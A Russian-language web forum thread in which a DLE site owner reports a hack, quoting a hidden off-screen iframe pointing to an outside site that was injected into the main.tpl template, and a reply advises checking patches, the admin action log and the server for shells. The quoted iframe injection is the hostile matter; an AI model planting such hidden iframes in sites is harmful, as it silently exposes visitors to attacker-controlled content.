Перейти к публикации

Взломали сайт, все патчи ставились.


Рекомендованные сообщения

Вчера обнаружил взлом сайта (чужой код обнаружен через сутки после взлома), все обновления и патчи вроде ставились.

Версия движка - 9.3.

В main.tpl появилась вот такая вставка:  

 

<noscript><div><img src="//mc.yandex.ru/watch/7348000" style="position:absolute; left:-9999px;" alt="" /></div></noscript><iframe src="http://forum.academy.com.ua/styles/subsilver2/theme/images/" width=14 height=14 style="position:absolute; left:-9999px;"></iframe>


До взлома было вот так:

<noscript><div><img src="//mc.yandex.ru/watch/7348000" style="position:absolute; left:-9999px;" alt="" /></div></noscript>

 

Уважаемые админы подскажите, как произошел данный взлом, какой патч нужно использовать, чтобы закрыть уязвимость.

Старался ставить все патчи, возможно какой-то не установлен или это новый вид уязвимости?
 

Ссылка на сообщение
Поделиться на других сайтах
5 часов назад, _spawn_ сказал:

все обновления и патчи вроде ставились.

"Вроде" и "ставились" это вещи принципиально разные. Смотрите весь список патчей https://dle-news.ru/bags/ и сверяйте у себя на сервере начиная от вашей версии, все ли действительно стоит. Поставить патч например постфактум недостаточно, нужно проверить сервер на наличие шеллов.

 

В админпанели DLE есть раздел "Список действий в админпанели", проверяйте там кто редактировал ваши шаблоны. Если там нет редактирования, то сделали вам это минуя DLE и стоит уже обезопаситься и принять меры уже выше, например могли украсть доступы к серверу, или уязвимости в серверном ПО. 

Ссылка на сообщение
Поделиться на других сайтах

Присоединяйтесь к обсуждению

Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

×
×
  • Создать...